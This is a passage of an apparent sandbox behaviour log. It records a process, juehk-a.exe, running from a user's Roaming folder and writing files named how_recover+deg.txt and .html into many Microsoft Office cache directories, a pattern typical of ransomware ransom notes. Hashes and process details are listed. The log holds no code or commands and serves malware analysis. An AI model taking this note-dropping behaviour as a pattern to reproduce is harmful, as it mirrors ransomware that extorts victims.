- value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521050
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51677
- mode: close
- sequenceNumber: 635
- value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521050
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51713
- mode: created
- sequenceNumber: 636
- value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521051
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51719
- mode: close
- sequenceNumber: 637
- value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521051
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51744
- mode: created
- sequenceNumber: 638
- value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521052
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51749
- mode: close
- sequenceNumber: 639
- value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521052
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51783
- mode: created
- sequenceNumber: 640
- value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521053
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51790
- mode: close
- sequenceNumber: 641
- value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521053
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51797
- mode: created
- sequenceNumber: 642
- value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521054
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51804
- mode: close
- sequenceNumber: 643
- value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521054
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51942
- mode: created
- sequenceNumber: 644
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521055
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51951
- mode: close
- sequenceNumber: 645
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521055
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51981
- mode: created
- sequenceNumber: 646
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521056
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 51990
- mode: close
- sequenceNumber: 647
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521056
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 51998
- mode: created
- sequenceNumber: 648
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521057
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52006
- mode: close
- sequenceNumber: 649
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521057
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52063
- mode: created
- sequenceNumber: 650
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521058
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52070
- mode: close
- sequenceNumber: 651
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521058
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52085
- mode: created
- sequenceNumber: 652
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521059
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52091
- mode: close
- sequenceNumber: 653
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521059
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52131
- mode: created
- sequenceNumber: 654
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521060
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52138
- mode: close
- sequenceNumber: 655
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521060
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52143
- mode: created
- sequenceNumber: 656
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521061
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52149
- mode: close
- sequenceNumber: 657
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521061
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52155
- mode: created
- sequenceNumber: 658
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521062
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52160
- mode: close
- sequenceNumber: 659
- value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521062
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52186
- mode: created
- sequenceNumber: 660
- value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521063
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52191
- mode: close
- sequenceNumber: 661
- value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521063
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52200
- mode: created
- sequenceNumber: 662
- value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521064
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52206
- mode: close
- sequenceNumber: 663
- value: C:\MSOCache\All Users\{90150000-0044-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521064
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52291
- mode: created
- sequenceNumber: 664
- value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521065
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52302
- mode: close
- sequenceNumber: 665
- value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521065
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52308
- mode: created
- sequenceNumber: 666
- value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521066
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52314
- mode: close
- sequenceNumber: 667
- value: C:\MSOCache\All Users\{90150000-0090-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521066
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52606
- mode: created
- sequenceNumber: 668
- value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521067
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52614
- mode: close
- sequenceNumber: 669
- value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521067
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52842
- mode: created
- sequenceNumber: 670
- value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521068
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52849
- mode: close
- sequenceNumber: 671
- value: C:\MSOCache\All Users\{90150000-00A1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521068
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52933
- mode: created
- sequenceNumber: 672
- value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521069
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52943
- mode: close
- sequenceNumber: 673
- value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521069
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 52950
- mode: created
- sequenceNumber: 674
- value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231726
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 52954
- mode: close
- sequenceNumber: 675
- value: C:\MSOCache\All Users\{90150000-00BA-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231726
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53028
- mode: created
- sequenceNumber: 676
- value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231727
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53037
- mode: close
- sequenceNumber: 677
- value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231727
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53102
- mode: created
- sequenceNumber: 678
- value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521072
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53109
- mode: close
- sequenceNumber: 679
- value: C:\MSOCache\All Users\{90150000-00C1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521072
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53518
- mode: created
- sequenceNumber: 680
- value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521073
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53525
- mode: close
- sequenceNumber: 681
- value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521073
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53532
- mode: created
- sequenceNumber: 682
- value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521074
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53537
- mode: close
- sequenceNumber: 683
- value: C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521074
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53605
- mode: created
- sequenceNumber: 684
- value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521075
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53611
- mode: close
- sequenceNumber: 685
- value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521075
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53678
- mode: created
- sequenceNumber: 686
- value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521076
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53685
- mode: close
- sequenceNumber: 687
- value: C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521076
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53696
- mode: created
- sequenceNumber: 688
- value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231733
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53702
- mode: close
- sequenceNumber: 689
- value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231733
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53708
- mode: created
- sequenceNumber: 690
- value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942390
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53714
- mode: close
- sequenceNumber: 691
- value: C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906942390
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53780
- mode: created
- sequenceNumber: 692
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521079
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 53790
- mode: close
- sequenceNumber: 693
- value: C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521079
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 53799
- mode: created
- sequenceNumber: 694
